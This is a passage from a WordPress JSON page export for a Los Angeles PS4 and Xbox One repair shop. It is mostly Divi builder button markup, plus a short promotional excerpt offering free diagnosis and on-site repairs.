text_line_height=”1.9em” background_size=”initial” background_position=”top_left” background_repeat=”repeat” animation_style=”fade” locked=”off”]<\/p>\n Get in touch or view our services!<\/p>\n [\/et_pb_text][\/et_pb_column][et_pb_column type=”1_4″ _builder_version=”3.0.47″ parallax=”off” parallax_method=”on”][et_pb_button button_url=”http:\/\/www.gameandvid.com\/services\/” button_text=”View services” button_alignment=”left” _builder_version=”3.19.2″ custom_button=”on” button_text_size=”16px” button_text_color=”#ffffff” button_bg_color=”#7272ff” button_border_width=”10px” button_border_color=”#7272ff” button_border_radius=”100px” button_letter_spacing=”1px” button_font=”|on||on|” button_icon=”%%36%%” button_on_hover=”off” box_shadow_style=”preset1″ box_shadow_vertical=”10px” box_shadow_blur=”50px” box_shadow_spread=”5px” box_shadow_color=”rgba(114,114,255,0.4)” custom_margin=”|||” animation_style=”zoom” animation_delay=”100ms” animation_intensity_zoom=”6%” button_letter_spacing_hover=”2px” locked=”off” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”on” button_letter_spacing__hover=”2px” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_button][\/et_pb_column][et_pb_column type=”1_4″ _builder_version=”3.0.47″ parallax=”off” parallax_method=”on”][et_pb_button button_url=”http:\/\/www.gameandvid.com\/contact\/” button_text=”Contact Us” button_alignment=”left” _builder_version=”3.19.2″ custom_button=”on” button_text_size=”16px” button_text_color=”#7272ff” button_bg_color=”#ffffff” button_border_width=”10px” button_border_color=”#ffffff” button_border_radius=”100px” button_letter_spacing=”1px” button_font=”|on||on|” button_icon=”%%36%%” button_on_hover=”off” box_shadow_style=”preset1″ box_shadow_vertical=”10px” box_shadow_blur=”50px” box_shadow_spread=”5px” box_shadow_color=”rgba(181,181,255,0.38)” custom_margin=”|||” animation_style=”zoom” animation_intensity_zoom=”6%” button_letter_spacing_hover=”2px” locked=”off” button_text_size__hover_enabled=”off” button_one_text_size__hover_enabled=”off” button_two_text_size__hover_enabled=”off” button_text_color__hover_enabled=”off” button_one_text_color__hover_enabled=”off” button_two_text_color__hover_enabled=”off” button_border_width__hover_enabled=”off” button_one_border_width__hover_enabled=”off” button_two_border_width__hover_enabled=”off” button_border_color__hover_enabled=”off” button_one_border_color__hover_enabled=”off” button_two_border_color__hover_enabled=”off” button_border_radius__hover_enabled=”off” button_one_border_radius__hover_enabled=”off” button_two_border_radius__hover_enabled=”off” button_letter_spacing__hover_enabled=”on” button_letter_spacing__hover=”2px” button_one_letter_spacing__hover_enabled=”off” button_two_letter_spacing__hover_enabled=”off” button_bg_color__hover_enabled=”off” button_one_bg_color__hover_enabled=”off” button_two_bg_color__hover_enabled=”off”][\/et_pb_button][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":" Your PS4 and Xbox One Repair Expert in LA!Bring us your broken console or electronics to be examined free of charge. All repairs are done on-site and will not be shipped to a third party.\u00a0Common ProblemsWe have laid out the most common issues to help you figure out what services are right for you! YouTube […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","_mi_skip_tracking":false},"yoast_head":"\nEasy As 1…2…3…<\/h1>\n
Ready to get started?<\/h1>\n